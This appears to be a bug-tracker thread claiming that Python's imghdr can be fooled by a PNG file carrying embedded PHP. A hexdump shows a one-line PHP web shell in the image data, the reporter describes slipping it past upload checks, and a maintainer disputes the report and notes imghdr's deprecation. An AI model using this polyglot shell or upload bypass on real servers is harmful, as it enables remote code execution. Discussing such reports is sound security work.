import imghdr
imghdr.what('phppng.png')

output : 
'png'

if you set javascript script in file .png or .jpg ,
output : 
ValueError: invalid \x escape

Hexdump:
root@Ramin:~# hexdump -C phppng.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52
|.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  
|... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e
|.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|
00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  
|c\<?=$_GET[0]($_|  ### Here PHP Code 
00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?>X....|
00000060  73 5e 37 93 fc 8f 8b db  7e 5f d3 7d aa 27 f7 f1  |s^7.....~_.}.'..|
00000070  e3 c9 bf 5f ef 06 7c b2  30 30 63 d9 b9 67 fd d9  |..._..|.00c..g..|
00000080  3d 1b ce 32 8c 82 51 30  0a 46 c1 28 18 05 a3 60  |=..2..Q0.F.(...`|
00000090  14 8c 82 51 30 0a 86 0d  00 00 81 b2 1b 02 07 78  |...Q0..........x|
000000a0  0d 0c 00 00 00 00 49 45  4e 44 ae 42 60 82        |......IEND.B`.|
000000ae

I'm sorry, I don't understand what you think is the bug here. It looks like you are passing a corrupted file which has a PNG extension but is not actually a PNG file (it contains PHP code). What do you expect should happen?

images can be served with a content type of text/html,(which means we can certainly inject HTML).

In normal if you choose a image and open image with editor set codes to image you get error , but I able to bypass image for upload if I use module imghdr for check valid image , booom upload image with malicious code ,

imghdr is deprecated as per PEP 594, so there won't be further enhancements to it.